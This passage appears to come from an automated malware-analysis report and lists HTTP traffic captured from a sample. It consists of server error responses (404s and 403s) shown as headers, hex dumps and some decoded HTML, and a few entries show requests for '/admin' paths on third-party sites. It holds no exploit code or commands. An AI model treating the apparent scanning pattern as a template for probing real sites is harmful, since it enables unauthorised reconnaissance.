3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Sucuri/CloudproxyDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14013X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=4813b33e8d8de01341c2649c91eea2fb; path=/Vary: Accept-EncodingX-Sucuri-Cache: MISSData Raw: 66 37 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 0a 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 36 33 33 33 35 34 37 34 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 36 33 33 33 35 34 37 34 30 22 20 2f 3e 0a 0a 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 61 6d 61 7a 6f 6e 61 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 74 68 65 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 61 6d 61 7a 6f 6e 61 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 71 75 69 63 6b 2d 6f 72 64 65 72 Data Ascii: f7e<!doctype html><html lang="en"> <head> <meta charset="utf-8"><meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 e
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://samson.pe/wp-json/>; rel="https://api.w.org/"content-length: 8901content-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:40 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 7d 5b 77 db 38 92 f0 b3 7d ce fc 07 84 39 b1 a5 6e de 25 f9 22 5b ea 71 d2 9e de ec a6 3b 99 38 d9 39 bb 49 4e 0e 44 42 12 12 92 60 03 a0 65 b5 5b 3f 66 1f f7 79 df f6 b5 ff d8 9e 02 78 13 4d c9 8e ed 9e ef cb 4c cb 24 50 a8 2a 14 aa 0a f7 e2 e9 93 90 05 72 99 12 34 97 71 34 de 3d 85 3f 28 c2 c9 6c 64 10 61 bd 39 37 20 8d e0 70 bc bb 73 1a 13 89 51 30 c7 5c 10 39 32 de bf fb 9b 75 64 94 e9 09 8e c9 c8 b8 a4 64 91 32 2e 0d 14 b0 44 92 44 8e 8c 05 0d e5 7c 14 92 4b 1a 10 4b bd 98 88 26 54 52 1c 59 22 c0 11 19 79 0a 4b 44 93 af 88 93 68 64 a4 9c 4d 69 44 0c 34 e7 64 3a 32 e6 52 a6 62 e8 38 b3 38 9d d9 8c cf 9c ab 69 e2 78 50 a8 e0 49 d1 de e7 6c c2 a4 d8 2f 29 ef 27 8c 26 21 b9 32 d1 94 45 11 5b ec 23 47 15 79 62 59 e8 dd 9c 0a 24 a8 24 88 0a c4 52 49 63 fa 1b 09 d1 82 ca 39 92 73 82 fe 83 61 21 d1 c5 f9 6b 94 46 d9 8c 26 e8 d2 f7 ec 01 b2 50 c1 cc 12 00 ec 80 c5 ce 82 f1 30 e5 44 08 47 83 0a 47 10 e6 20 cb 02 d1 48 2a 23 32 7e f3 c7 7f cd 68 82 51 c2 10 49 40 30 1c 87 18 59 e8 02 c7 82 25 e8 05 a4 b0 48 a0 37 84 ff f1 bf a7 8e 2e 54 54 2e e5 2c 25 5c 2e 47 06 9b 0d 23 06 12 ab 49 97 88 cf e7 17 06 d4 2c 6f 9f 35 70 85 a9 06 fd 4d 8c 6c c4 0a 72 fb 0c 32 af 61 6e ad 4a 8e 41 04 9c a6 12 81 9a 8d 0c 9c a6 11 0d b0 a4 2c 71 a2 f0 fb 2f 82 25 06 0a 22 2c c4 c8 50 42 b5 44 30 27 31 b6 66 1c a7 73 63 7c 6d fc 55 a9 d2 95 34 86 a5 2a 68 10 50 06 c3 34 fe aa 21 87 1f ae 8d bf 02 0d 63 68 fc 83 4c 2e a8 24 90 49 c3 7a 39 25 70 3b 25 ce d3 05 99 40 3d 0c d3 c8 78 d4 0a 62 98 86 aa e4 d0 68 af 9c 69 84 44 57 8d b2 c4 18 1a 86 69 a4 d9 24 a2 62 4e b8 31 bc de 4c 9a f1 19 4e e8 6f 4a 06 c6 ca 34 52 06 96 42 71 74 16 80 58 8c 7a 4d 2e 08 e6 c1 3c cf 30 0d 89 f9 8c 48 85 3d af ea 79 22 f9 f2 0d a3 89 d4 55 79 47 e2 34 c2 12 a4 50 e8 aa 28 6b fd 83 18 5d 0b 85 f1 b3 24 3c fe 2c 24 a7 c9 6c 05 4c fc 9a 11 be b4 68 92 66 20 68 4e 7e cd 28 27 21 52 a6 75 b3 88 b1 fa 64 1a 34 79 85 93 59 86 67 40 4c 7b 8b 95 59 35 c2 eb 7a 35 b7 b4 c4 9a 38 6e 95 f9 96 d6 8a d8 8c d5 45 f3 32 c6 33 f2 7a f2 85 04 20 9b 16 6e b7 30 e5 68 15 73 00 a7 43 01 91 b3 45 55 16 a9 95 fb 3b 27 4b 23 86 43 e1 f8 ae ef 3b ee 81 42 60 15 2d 90 80 be e6 90 ef 37 a8 dd 37 e1 52 fe d4 18 1e bb a6 31 27 74 36 97 fa 39 c0 a9 d6 a4 0d aa bb 32 0d 55 a7 ad 6a da 26 82 95 69 08 1c 93 33 61 0c 3f 94 fa b5 58 2c ec 25 cb 64 36 21 ca 23 66 82 70 e7 e2 ec e7 8b d7 bf fc f4 f6 f5 fb 37 c6 a7 d5 a7 d5 a9 a3 6d 05 1c 15 78 60 e7 86 8f b5 95 cf dc dd 3d 2d 7b 82 fd 30 11 56 ca c9 94 c8 60 be af bb 83 7d c7 01 7a 33 c6 66 11 91 78 16 e3 04 cf 08 07 c2 ca
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: 1d31691e-bca9-4d49-89fb-90b527477ecbData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 4814e0fe-084c-41d8-ac2d-b9719a8c0144Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-53.ec2.internalX-Request-Id: 159770e6-894b-4e9a-9c76-e9dfca7b456aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 62 76 68 72 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at bvhrs.com Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:40 GMTServer: ApacheContent-Length: 208Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 64 6d 69 6e 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /admin/on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:40 GMTserver: LiteSpeedData Raw: 32 66 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 26 37 93 9c ad 5b 93 39 2a 88 84 24 cc 50 04 97 80 64 7b 3d fe 41 f7 6f dc 5f 76 ab f1 20 41 8a 7a f8 91 9c f3 e1 2a 95 31 09 02 dd 8d 46 a3 d1 00 ba 81 ab 57 11 0b c5 5d 4a d0 42 2c e3 eb a3 2b f8 83 62 9c cc c7 0e 49 bc df de 39 47 8d 34 23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33 Data Ascii: 2f
